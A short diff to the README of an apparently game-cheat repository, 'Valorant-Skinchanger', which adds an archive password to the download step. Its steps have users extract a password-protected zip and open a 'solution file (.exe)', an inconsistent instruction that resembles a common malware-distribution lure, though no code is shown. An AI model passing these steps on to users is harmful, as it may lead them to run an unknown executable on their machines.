me304241/Valorant-Skinchanger/README.md

 ## Usage

-- Download the project to your computer as zip
+- Download the project to your computer as zip (pass 6678).
 - Extract Project to Folder.
 - Open the solution file (.exe).
 - Select **Build Solution** from the **Build** menu or press `Ctrl+Shift+B` to compile the project.